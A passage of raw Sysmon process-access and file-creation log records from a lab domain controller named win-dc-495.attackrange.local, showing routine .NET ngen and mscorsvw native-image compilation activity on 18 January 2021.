+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006102Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:23.437{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912F-6005-E801-00000000A301}4476C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006101Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:23.421{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-912F-6005-E801-00000000A301}4476C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006100Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:23.421{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912F-6005-E801-00000000A301}4476C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006099Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:23.359{59A5CD1D-912F-6005-E701-00000000A301}3376C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\d30-0\Microsoft.Transactions.Bridge.Dtc.dll2021-01-18 13:46:23.359 10341000x80000000000000006098Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:23.140{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912F-6005-E701-00000000A301}3376C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006097Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:23.125{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-912F-6005-E701-00000000A301}3376C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006096Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:23.125{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912F-6005-E701-00000000A301}3376C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006095Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:23.078{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912F-6005-E601-00000000A301}4992C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006094Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:23.062{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-912F-6005-E601-00000000A301}4992C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006093Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:23.062{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912F-6005-E601-00000000A301}4992C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006115Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:24.796{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9130-6005-EC01-00000000A301}4772C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006114Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:24.781{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9130-6005-EC01-00000000A301}4772C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006113Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:24.781{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9130-6005-EC01-00000000A301}4772C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006112Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:24.453{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9130-6005-EB01-00000000A301}3180C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006111Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:24.437{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9130-6005-EB01-00000000A301}3180C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006110Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:24.437{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9130-6005-EB01-00000000A301}3180C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006109Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:24.359{59A5CD1D-912F-6005-EA01-00000000A301}880C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\370-0\Microsoft.VisualBasic.Activities.Compiler.dll2021-01-18 13:46:24.359 11241100x80000000000000006123Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:26.968{59A5CD1D-9132-6005-EE01-00000000A301}5108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\13f4-0\Microsoft.VisualBasic.Compatibility.Data.dll2021-01-18 13:46:26.968 10341000x80000000000000006122Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:26.656{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9132-6005-EE01-00000000A301}5108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006121Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:26.656{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9132-6005-EE01-00000000A301}5108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006120Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:26.656{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9132-6005-EE01-00000000A301}5108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006119Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:26.593{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9132-6005-ED01-00000000A301}1196C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006118Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:26.578{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9132-6005-ED01-00000000A301}1196C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006117Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:26.578{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9132-6005-ED01-00000000A301}1196C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006116Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:26.484{59A5CD1D-9130-6005-EC01-00000000A301}4772C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\12a4-0\Microsoft.VisualBasic.Compatibility.dll2021-01-18 13:46:26.484 10341000x80000000000000006169Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:27.937{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9133-6005-FD01-00000000A301}2592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006168Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.921{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9133-6005-FD01-00000000A301}2592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006167Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:27.921{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9133-6005-FD01-00000000A301}2592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\F